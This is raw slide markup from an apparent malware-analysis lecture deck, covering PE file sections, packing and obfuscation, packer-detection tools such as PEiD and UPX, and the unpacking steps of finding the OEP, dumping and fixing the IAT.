                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.edata</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Sometimes presents and stores the export function information; if this section is not present, the export function information is stored in the .rdata section.</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759960">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.pdata</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Present only in 64-bit executables and stores exception-handling information.</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44240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.rsrc</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Stores resources needed by the executable</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44960">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.reloc</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Contains information for relocation of library files</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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Packing and Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150"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Malware writer often use packing and obfuscation to make their files more difficult to detect or analyse.</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i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscated programs</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: malware writer has attempted to hide.</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i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Packed programs</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: a subset of obfuscated programs in which the malicious program is compressed and unable to be analysed.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611640" y="5266080"/>
            <a:ext cx="8136720" cy="1006560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="e5dfec">
              <a:alpha val="49000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Packed and obfuscated code will often include at least the functions LoadLibrary and GetProcAddress, which are used to load and gain access to additional functions.</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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Packing and Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153"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Packing Files</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="Google Shape;248;p22" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971640" y="1820520"/>
            <a:ext cx="7481160" cy="4199760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780000" y="2061000"/>
            <a:ext cx="1295640" cy="1859400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38160">
            <a:solidFill>
              <a:srgbClr val="ffff00"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3751560" y="5157720"/>
            <a:ext cx="1467720" cy="143640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38160">
            <a:solidFill>
              <a:srgbClr val="ffff00"/>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7" name="Google Shape;255;p23" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3658320" y="1917000"/>
            <a:ext cx="5485320" cy="4142880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Packing and Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="439200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Once a program is packed, it must be unpacked  before performing an analysis.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Detecting packer: PEiD</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Packing/Unpacking: UPX</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Examining header: PEview, Resource Hacker</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>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Unpacking</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="161" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="464400" y="3104280"/>
            <a:ext cx="8214840" cy="1296720"/>
            <a:chOff x="464400" y="3104280"/>
            <a:chExt cx="8214840" cy="1296720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="CustomShape 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="464400" y="3104280"/>
              <a:ext cx="2161440" cy="1296720"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 10000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="163" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="502560" y="3142440"/>
              <a:ext cx="2085480" cy="1220760"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr tIns="91440" bIns="91440" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Find OEP</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="164" name="CustomShape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2842560" y="3484800"/>
              <a:ext cx="457920" cy="535680"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60000"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="b1c0d7"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="165" name="CustomShape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2842560" y="3592080"/>
              <a:ext cx="320400" cy="321480"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="166" name="CustomShape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3490920" y="3104280"/>
              <a:ext cx="2161440" cy="1296720"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 10000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="167" name="CustomShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3529080" y="3142440"/>
              <a:ext cx="2085480" cy="1220760"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr tIns="91440" bIns="91440" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Dump</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="CustomShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5869080" y="3484800"/>
              <a:ext cx="457920" cy="535680"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60000"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="b1c0d7"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="169" name="CustomShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5869080" y="3592080"/>
              <a:ext cx="320400" cy="321480"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="170" name="CustomShape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6517800" y="3104280"/>
              <a:ext cx="2161440" cy="1296720"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 10000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="CustomShape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6555600" y="3142440"/>
              <a:ext cx="2085480" cy="1220760"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr tIns="91440" bIns="91440" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Fix IAT</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
